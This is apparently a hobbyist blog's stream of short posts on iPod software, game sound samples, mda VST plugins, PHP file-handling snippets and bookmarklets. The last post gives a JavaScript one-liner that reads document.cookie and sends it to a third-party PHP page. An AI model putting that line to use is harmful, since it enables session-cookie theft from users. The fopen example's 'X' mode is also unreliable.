Copy from iPhone/iPod to Computer

Since Apple loves to prohibit you from basic functionality, I was forced to go dig around the interwebs for some software.

I found this rad software called floola that will allow you to copy anything from your iPhone or iPod to your computer!

The best part it's completely free. I found a few others out there, but most of them sucked or where paid versions. Most of them that can't even do as much as floola.

Download it and give a whirl, floola currently supports Windows, Mac (10.3 and above) and Linux (GTK)!

Ubuntu users:
sudo apt-get install libnotify-bin

Debian users:
su -c “apt-get install libnotify-bin”

Mortal Kombat Samples

Test your might! Yep we all played this game at least once in our lives. Some of us more then others, needless to say this classic fighter will never die. Our children's children will be playing this one. It might not be the original Mortal Kombat, probably MK3030 on the PSY3K.

Anyways here are the game samples from SNES, download'em.

Double Dragon 2

Double Dragon Samples

Billy and Jimmy Lee aka "Hammer and Spike" found their way into homes via SNES. Well known in the Arcade scene the action fighter was an instant success.

mda - open source vst

The mda vst's have been around a while, and enjoy using them with fruity loops. In this post I'll recommend a few of them I use often, but I suggest you give them a shot yourself and find which effects vibe with you. These are free effects and they work with Cubase, FruityLoops and other VST compatible applications.

The mda effects that I use the most would have to be degrade, sub-bass synthesizer, and the limiter. These plugins have proven to work very well in FL Studio, linking the knobs to controllers or using them in recorded automation is a cinch!

mda degrade - If you want to do some bit crushing the mda degrade plugin will do that perfectly. I use it often on my drums to get that grungy snare and noisey kick.

mda subsynth - Looking for that kicking bass? Well you have found it. The one thing I love about this effect is the ability to change the release function. You can get that quick punchy bass or if you crave the sustained low tones just increase the release.

mda also makes a few synth plug-ins, you can download those here, if you are a fruity loops user, then you maybe familiar with the JX10 and DX10 synths and the piano vsts. They are very similar to the fruity keys and DX instrument that come with FL.

mda is also open source, if you are interested in the source code,  if you are looking for mac or windows versions visit the official mda website at http://mda.smartelectronix.com/

Web Design Nightmare FFFUUUU

Yamaha CS-80 Synth

It can generate great analog strings, brass, drones and pads with that instantly recognizable classic polysynth sound. Even harmonica and saxophone sound are possible - this can be heard on the Blade Runner soundtrack by Vangelis, in which virtually all the sounds are created from the CS-80. It was discontinued in 1980.

php - preg_match

Getting the domain name out of a URL

// get host name from URL
preg_match('@^(?:http://)?([^/]+)@i',
   "http://www.php.net/index.html", $matches);
$host = $matches[1];

// get last two segments of host name
preg_match('/[^.]+\.[^.]+$/', $host, $matches);
echo "domain name is: {$matches[0]}\n";

php - file open

For many different technical reasons, PHP requires you to specify your intentions when you open a file. Below are the three basic ways to open a file and the corresponding character that PHP uses.

$ourFileName = "testFile.txt";
$fh = fopen($ourFileName, 'X') or die("Can't open file");
fclose($fh);

Read: 'r'
Open a file for read only use. The file pointer begins at the front of the file.

Write: 'w'
Open a file for write only use. In addition, the data in the file is erased and you will begin writing data at the beginning of the file. This is also called truncating a file, which we will talk about more in a later lesson. The file pointer begins at the start of the file.

Append: 'a'
Open a file for write only use. However, the data in the file is preserved and you begin will writing data at the end of the file. The file pointer begins at the end of the file.

A file pointer is PHP's way of remembering its location in a file. When you open a file for reading, the file pointer begins at the start of the file. This makes sense because you will usually be reading data from the front of the file.

However, when you open a file for appending, the file pointer is at the end of the file, as you most likely will be appending data at the end of the file. When you use reading or writing functions they begin at the location specified by the file pointer.

php - file write

Now that you know how to open and close a file, lets get on to the most useful part of file manipulation, writing! There is really only one main function that is used to write and it's logically called fwrite.

$filename= "myfile.txt";
$fh = fopen($filename, 'w') or die("Can't open file!");
$string= "Pointy Pinto\n";
fwrite($fh, $string);
fclose($fh);

bit.ly - bookmarklet

Create bit.ly links on the fly with this bookmarklet. Just add the code below to a bookmark and click it when you want to create a short url with bit.ly.

javascript:void(location.href='http://bit.ly/?s=&url='+encodeURIComponent(location.href))

Image Shack - bookmarklet

Add this javascript as a bookmarklet, then when you are viewing an image (jpg,gif,png) you can click the bookmark link and it will post the image to imageshack for you.

javascript:void(location.href='http://www.imageshack.us/transload.php?uploadtype=on&url='+encodeURIComponent(location.href))

Javascript Cookie Monster

So today I just realized you can grab client cookies with javascript, I demonstrated by getting my own by putting this link as bookmark and viewing "said" page that I am getting cookies from. Then passing the cookie string to a third party php page to process, email or whatever you feel like doing.

javascript:var%20x%20=%20document.cookie;window.open('http://www.webpage.com/cookies.php?cookie='+x,'newpage','width=100,height=100');
